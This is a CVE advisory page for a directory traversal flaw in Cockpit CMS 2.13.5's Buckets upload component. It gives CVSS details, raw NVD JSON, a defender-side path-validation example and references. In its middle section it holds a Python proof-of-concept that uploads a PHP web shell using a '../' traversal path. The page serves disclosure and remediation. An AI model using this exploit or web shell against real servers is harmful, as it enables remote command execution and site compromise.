Security Vulnerability Report
CVE-2026-38993 CVSS 6.5 MEDIUM

CVE-2026-38993

Published: 2026-04-29 16:16:24
Last Modified: 2026-04-29 21:22:20

Description

Cockpit 2.13.5 and earlier is vulnerable to directory traversal via the Buckets component. This vulnerability allows authenticated attackers to write files to arbitrary locations within the uploads directory or overwrite assets with malicious versions.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Cockpit CMS <= 2.13.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL
url = "http://target.com/api/buckets/upload"

# Attacker's session cookie (authenticated user)
cookies = {
    "cockpit": "session_token_here"
}

# Malicious file content
files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}

# Payload exploiting directory traversal to write to webroot
data = {
    'path': '../../../tmp/uploads/shell.php'  # Or path to overwrite an asset
}

response = requests.post(url, files=files, data=data, cookies=cookies)

if response.status_code == 200:
    print("[+] Exploit successful! File written.")
else:
    print("[-] Exploit failed.")
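The defect behind CWE-22 in the description above is a server that joins a client-supplied path onto the uploads directory without confirming the result stays inside it. The following is an added, defender-side example written for this report; it is not Cockpit's code and does not reflect how Cockpit's Buckets component is implemented. The uploads root (`/srv/uploads`), the function names and the `rejects` helper are assumptions for the demonstration. It places the unchecked join next to a containment check that rejects dot segments, absolute paths, NUL bytes, backslash separators and symlink escapes, then verifies the resolved path is still under the base.

```python
import os
from pathlib import Path, PurePosixPath

# Assumed uploads root for the demonstration; not Cockpit's real storage layout.
UPLOADS_DIR = "/srv/uploads"


class UnsafePathError(ValueError):
    """Raised when a client-supplied path would leave the uploads directory."""


def vulnerable_destination(base: str, requested: str) -> str:
    """The CWE-22 pattern: join the client's 'path' to the base with no
    containment check, so '../' segments walk out of the uploads directory."""
    return os.path.normpath(os.path.join(base, requested))


def safe_destination(base: str, requested: str) -> Path:
    """Resolve a client-supplied relative path under `base`, or raise
    UnsafePathError if it would point anywhere outside `base`."""
    base_dir = Path(base).resolve()
    if "\x00" in requested:
        raise UnsafePathError("NUL byte in path")
    # Treat backslashes as separators so '..\\' cannot bypass a '../' check.
    rel = PurePosixPath(requested.replace("\\", "/"))
    if rel.is_absolute():
        raise UnsafePathError("absolute path rejected")
    if not rel.parts:
        raise UnsafePathError("empty path rejected")
    if ".." in rel.parts:
        raise UnsafePathError("parent-directory segment rejected")
    # resolve() follows symlinks in any existing prefix, so a symlinked
    # subfolder cannot be used to redirect the write outside the base either.
    candidate = (base_dir / rel).resolve()
    try:
        candidate.relative_to(base_dir)
    except ValueError as exc:
        raise UnsafePathError("resolved path escapes uploads directory") from exc
    return candidate


def rejects(base: str, requested: str) -> bool:
    """True if safe_destination refuses `requested` (helper for the demo)."""
    try:
        safe_destination(base, requested)
    except UnsafePathError:
        return True
    return False


if __name__ == "__main__":
    traversal = "../../../tmp/uploads/shell.php"  # the 'path' value from the PoC above
    print("unchecked join ->", vulnerable_destination(UPLOADS_DIR, traversal))
    print("checked join   -> rejected:", rejects(UPLOADS_DIR, traversal))
    print("normal upload  ->", safe_destination(UPLOADS_DIR, "2026/04/report.pdf"))
```

The explicit `..` check and the `relative_to` check after `resolve()` are both kept on purpose: the first gives a clear rejection reason and catches the obvious payload, the second catches anything the first misses, such as a symlink inside the uploads tree pointing outside it. A real upload handler would additionally restrict the stored file extension and content type, since the PoC relies on the server accepting a `.php` file.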

References

https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/
https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-38993",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-29T16:16:23.907",
    "lastModified": "2026-04-29T21:22:20.120",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Cockpit 2.13.5 and earlier is vulnerable to directory traversal via the Buckets component. This vulnerability allows authenticated attackers to write files to arbitrary locations within the uploads directory or overwrite assets with malicious versions."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0",
        "source": "[email protected]"
      },
      {
        "url": "https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}